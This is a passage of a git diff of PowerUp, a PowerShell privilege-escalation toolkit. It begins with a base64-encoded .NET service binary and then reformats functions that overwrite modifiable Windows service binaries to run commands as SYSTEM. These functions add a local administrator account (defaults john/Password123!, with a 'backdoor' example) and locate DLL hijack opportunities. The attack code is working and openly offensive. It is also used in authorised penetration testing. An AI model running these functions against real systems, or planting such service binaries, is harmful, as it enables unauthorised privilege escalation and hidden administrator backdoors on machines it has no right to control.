AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAA9jAG0AZAAuAGUAeABlAABwlQEkfW6TS5S/gwmLKZ5MAAiwP19/EdUKOgi3elxWGTTgiQMGEg0EIAEBAgMgAAEFIAEBHQ4DAAABBCABAQ4FIAEBEUkEIAEBCAMgAA4GAAISYQ4OBAABAQgDBwEOBgABAR0SBQgHAh0SBR0SBQwBAAdVcGRhdGVyAAAFAQAAAAAXAQASQ29weXJ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"
         [Byte[]] $Binary = [Byte[]][Convert]::FromBase64String($B64Binary)
 
-        if($PSBoundParameters['Command']) {
+        if ($PSBoundParameters['Command']) {
             $ServiceCommand = $Command
         }
         else {
-            if($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Credential']) {
                 $UserNameToAdd = $Credential.UserName
                 $PasswordToAdd = $Credential.GetNetworkCredential().Password
             }
@@ -1995,7 +2640,7 @@ function Write-ServiceBinary {
                 $PasswordToAdd = $Password
             }
 
-            if($UserNameToAdd.Contains('\')) {
+            if ($UserNameToAdd.Contains('\')) {
                 # only adding a domain user to the local group, no user creation
                 $ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /add"
             }
@@ -2031,6 +2676,7 @@ function Write-ServiceBinary {
         $Out | Add-Member Noteproperty 'ServiceName' $TargetService.Name
         $Out | Add-Member Noteproperty 'Path' $Path
         $Out | Add-Member Noteproperty 'Command' $ServiceCommand
+        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary')
         $Out
     }
 }
@@ -2038,87 +2684,97 @@ function Write-ServiceBinary {
 
 function Install-ServiceBinary {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Replaces the service binary for the specified service with one that executes
-        a specified command as SYSTEM.
+Replaces the service binary for the specified service with one that executes
+a specified command as SYSTEM.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary  
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the
-        current user can  modify the associated service binary listed in the binPath. Backs up
-        the original service binary to "OriginalService.exe.bak" in service binary location,
-        and then uses Write-ServiceBinary to create a C# service binary that either adds
-        a local administrator user or executes a custom command. The new service binary is
-        replaced in the original service binary path, and a custom object is returned that
-        captures the original and new service binary configuration.
+Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the
+current user can  modify the associated service binary listed in the binPath. Backs up
+the original service binary to "OriginalService.exe.bak" in service binary location,
+and then uses Write-ServiceBinary to create a C# service binary that either adds
+a local administrator user or executes a custom command. The new service binary is
+replaced in the original service binary path, and a custom object is returned that
+captures the original and new service binary configuration.
 
-    .PARAMETER Name
+.PARAMETER Name
 
-        The service name the EXE will be running under.
+The service name the EXE will be running under.
 
-    .PARAMETER UserName
+.PARAMETER UserName
 
-        The [domain\]username to add. If not given, it defaults to "john".
-        Domain users are not created, only added to the specified localgroup.
+The [domain\]username to add. If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
 
-    .PARAMETER Password
+.PARAMETER Password
 
-        The password to set for the added user. If not given, it defaults to "Password123!"
+The password to set for the added user. If not given, it defaults to "Password123!"
 
-    .PARAMETER LocalGroup
+.PARAMETER LocalGroup
 
-        Local group name to add the user to (default of 'Administrators').
+Local group name to add the user to (default of 'Administrators').
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object specifying the user/password to add.
+A [Management.Automation.PSCredential] object specifying the user/password to add.
 
-    .PARAMETER Command
+.PARAMETER Command
 
-        Custom command to execute instead of user creation.
+Custom command to execute instead of user creation.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Install-ServiceBinary -Name VulnSVC
+Install-ServiceBinary -Name VulnSVC
 
-        Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
-        for VulnSVC with one that adds a local Administrator (john/Password123!).
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (john/Password123!).
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-Service VulnSVC | Install-ServiceBinary
+Get-Service VulnSVC | Install-ServiceBinary
 
-        Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
-        for VulnSVC with one that adds a local Administrator (john/Password123!).
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (john/Password123!).
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
+Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
 
-        Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
-        for VulnSVC with one that adds TESTLAB\john to the Administrators local group.
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds TESTLAB\john to the Administrators local group.
 
-    .EXAMPLE
+.EXAMPLE
+
+Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (backdoor/Password123!).
 
-        PS C:\> Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+.EXAMPLE
 
-        Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
-        for VulnSVC with one that adds a local Administrator (backdoor/Password123!).
+Install-ServiceBinary -Name VulnSVC -Command "net ..."
 
-    .EXAMPLE
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that executes a custom command.
 
-        PS C:\> Install-ServiceBinary -Name VulnSVC -Command "net ..."
+.OUTPUTS
 
-        Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
-        for VulnSVC with one that executes a custom command.
+PowerUp.ServiceBinary.Installed
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+    [OutputType('PowerUp.ServiceBinary.Installed')]
+    [CmdletBinding()]
     Param(
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String]
         [ValidateNotNullOrEmpty()]
@@ -2134,7 +2790,8 @@ function Install-ServiceBinary {
         $LocalGroup = 'Administrators',
 
         [Management.Automation.PSCredential]
-        $Credential,
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
         [String]
         [ValidateNotNullOrEmpty()]
@@ -2142,11 +2799,11 @@ function Install-ServiceBinary {
     )
 
     BEGIN {
-        if($PSBoundParameters['Command']) {
+        if ($PSBoundParameters['Command']) {
             $ServiceCommand = $Command
         }
         else {
-            if($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Credential']) {
                 $UserNameToAdd = $Credential.UserName
                 $PasswordToAdd = $Credential.GetNetworkCredential().Password
             }
@@ -2155,7 +2812,7 @@ function Install-ServiceBinary {
                 $PasswordToAdd = $Password
             }
 
-            if($UserNameToAdd.Contains('\')) {
+            if ($UserNameToAdd.Contains('\')) {
                 # only adding a domain user to the local group, no user creation
                 $ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /add"
             }
@@ -2167,14 +2824,11 @@ function Install-ServiceBinary {
     }
 
     PROCESS {
-
-        $TargetService = Get-Service -Name $Name
-
+        $TargetService = Get-Service -Name $Name -ErrorAction Stop
         $ServiceDetails = $TargetService | Get-ServiceDetail
+        $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -Literal
 
-        $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -LiteralPaths
-
-        if(-not $ModifiableFiles) {
+        if (-not $ModifiableFiles) {
             throw "Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user."
         }
 
@@ -2192,6 +2846,7 @@ function Install-ServiceBinary {
 
         $Result = Write-ServiceBinary -Name $ServiceDetails.Name -Command $ServiceCommand -Path $ServicePath
         $Result | Add-Member Noteproperty 'BackupPath' $BackupPath
+        $Result.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary.Installed')
         $Result
     }
 }
@@ -2199,46 +2854,57 @@ function Install-ServiceBinary {
 
 function Restore-ServiceBinary {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Restores a service binary backed up by Install-ServiceBinary.
+Restores a service binary backed up by Install-ServiceBinary.
 
-    .DESCRIPTION
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath  
 
-        Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
-        checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
-        binary location. If it exists, the backup binary is restored to the original
-        binary path.
+.DESCRIPTION
+
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
+checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
+binary location. If it exists, the backup binary is restored to the original
+binary path.
+
+.PARAMETER Name
 
-    .PARAMETER Name
+The service name to restore a binary for.
 
-        The service name to restore a binary for.
+.PARAMETER BackupPath
 
-    .PARAMETER BackupPath
+Optional manual path to the backup binary.
+
+.EXAMPLE
 
-        Optional manual path to the backup binary.
+Restore-ServiceBinary -Name VulnSVC
 
-    .EXAMPLE
+Restore the original binary for the service 'VulnSVC'.
 
-        PS C:\> Restore-ServiceBinary -Name VulnSVC
+.EXAMPLE
 
-        Restore the original binary for the service 'VulnSVC'.
+Get-Service VulnSVC | Restore-ServiceBinary
 
-    .EXAMPLE
+Restore the original binary for the service 'VulnSVC'.
 
-        PS C:\> Get-Service VulnSVC | Restore-ServiceBinary
+.EXAMPLE
 
-        Restore the original binary for the service 'VulnSVC'.
+Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
 
-    .EXAMPLE
+Restore the original binary for the service 'VulnSVC' from a custom location.
 
-        PS C:\> Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
+.OUTPUTS
 
-        Restore the original binary for the service 'VulnSVC' from a custom location.
+PowerUp.ServiceBinary.Installed
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.ServiceBinary.Restored')]
+    [CmdletBinding()]
     Param(
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String]
         [ValidateNotNullOrEmpty()]
@@ -2251,14 +2917,11 @@ function Restore-ServiceBinary {
     )
 
     PROCESS {
-
-        $TargetService = Get-Service -Name $Name
-
+        $TargetService = Get-Service -Name $Name -ErrorAction Stop
         $ServiceDetails = $TargetService | Get-ServiceDetail
+        $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -Literal
 
-        $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -LiteralPaths
-
-        if(-not $ModifiableFiles) {
+        if (-not $ModifiableFiles) {
             throw "Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user."
         }
 
@@ -2272,6 +2935,7 @@ function Restore-ServiceBinary {
         $Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.Name
         $Out | Add-Member Noteproperty 'ServicePath' $ServicePath
         $Out | Add-Member Noteproperty 'BackupPath' $BackupPath
+        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary.Restored')
         $Out
     }
 }
@@ -2285,70 +2949,77 @@ function Restore-ServiceBinary {
 
 function Find-ProcessDLLHijack {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Finds all DLL hijack locations for currently running processes.
+Finds all DLL hijack locations for currently running processes.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Enumerates all currently running processes with Get-Process (or accepts an
-        input process object from Get-Process) and enumerates the loaded modules for each.
-        All loaded module name exists outside of the process binary base path, as those
-        are DLL load-order hijack candidates.
+Enumerates all currently running processes with Get-Process (or accepts an
+input process object from Get-Process) and enumerates the loaded modules for each.
+All loaded module name exists outside of the process binary base path, as those
+are DLL load-order hijack candidates.
 
-    .PARAMETER Name
+.PARAMETER Name
 
-        The name of a process to enumerate for possible DLL path hijack opportunities.
+The name of a process to enumerate for possible DLL path hijack opportunities.
 
-    .PARAMETER ExcludeWindows
+.PARAMETER ExcludeWindows
 
-        Exclude paths from C:\Windows\* instead of just C:\Windows\System32\*
+Exclude paths from C:\Windows\* instead of just C:\Windows\System32\*
 
-    .PARAMETER ExcludeProgramFiles
+.PARAMETER ExcludeProgramFiles
 
-        Exclude paths from C:\Program Files\* and C:\Program Files (x86)\*
+Exclude paths from C:\Program Files\* and C:\Program Files (x86)\*
 
-    .PARAMETER ExcludeOwned
+.PARAMETER ExcludeOwned
 
-        Exclude processes the current user owns.
+Exclude processes the current user owns.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Find-ProcessDLLHijack
+Find-ProcessDLLHijack
 
-        Finds possible hijackable DLL locations for all processes.
+Finds possible hijackable DLL locations for all processes.
 
-    .EXAMPLE
+.EXAMPLE
+
+Get-Process VulnProcess | Find-ProcessDLLHijack
 
-        PS C:\> Get-Process VulnProcess | Find-ProcessDLLHijack
+Finds possible hijackable DLL locations for the 'VulnProcess' processes.
 
-        Finds possible hijackable DLL locations for the 'VulnProcess' processes.
+.EXAMPLE
 
-    .EXAMPLE
+Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles
 
-        PS C:\> Find-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles
+Finds possible hijackable DLL locations not in C:\Windows\* and
+not in C:\Program Files\* or C:\Program Files (x86)\*
+
+.EXAMPLE
 
-        Finds possible hijackable DLL locations not in C:\Windows\* and
-        not in C:\Program Files\* or C:\Program Files (x86)\*
+Find-ProcessDLLHijack -ExcludeOwned
 
-    .EXAMPLE
+Finds possible hijackable DLL location for processes not owned by the
+current user.
 
-        PS C:\> Find-ProcessDLLHijack -ExcludeOwned
+.OUTPUTS
 
-        Finds possible hijackable DLL location for processes not owned by the
-        current user.
+PowerUp.HijackableDLL.Process
 
-    .LINK
+.LINK
 
-        https://www.mandiant.com/blog/malware-persistence-windows-registry/
+https://www.mandiant.com/blog/malware-persistence-windows-registry/
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.HijackableDLL.Process')]
     [CmdletBinding()]
     Param(
-        [Parameter(Position=0, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ProcessName')]
         [String[]]
         $Name = $(Get-Process | Select-Object -Expand Name),
@@ -2381,13 +3052,11 @@ function Find-ProcessDLLHijack {
 
             $TargetProcess = Get-Process -Name $ProcessName
 
-            if($TargetProcess -and $TargetProcess.Path -and ($TargetProcess.Path -ne '') -and ($TargetProcess.Path -ne $Null)) {
+            if ($TargetProcess -and $TargetProcess.Path -and ($TargetProcess.Path -ne '') -and ($Null -ne $TargetProcess.Path)) {
 
                 try {
                     $BasePath = $TargetProcess.Path | Split-Path -Parent
-
                     $LoadedModules = $TargetProcess.Modules
-
                     $ProcessOwner = $Owners[$TargetProcess.Id.ToString()]
 
                     ForEach ($Module in $LoadedModules){
@@ -2399,15 +3068,15 @@ function Find-ProcessDLLHijack {
 
                             $Exclude = $False
 
-                            if($PSBoundParameters['ExcludeWindows'] -and $ModulePath.Contains('C:\Windows')) {
+                            if ($PSBoundParameters['ExcludeWindows'] -and $ModulePath.Contains('C:\Windows')) {
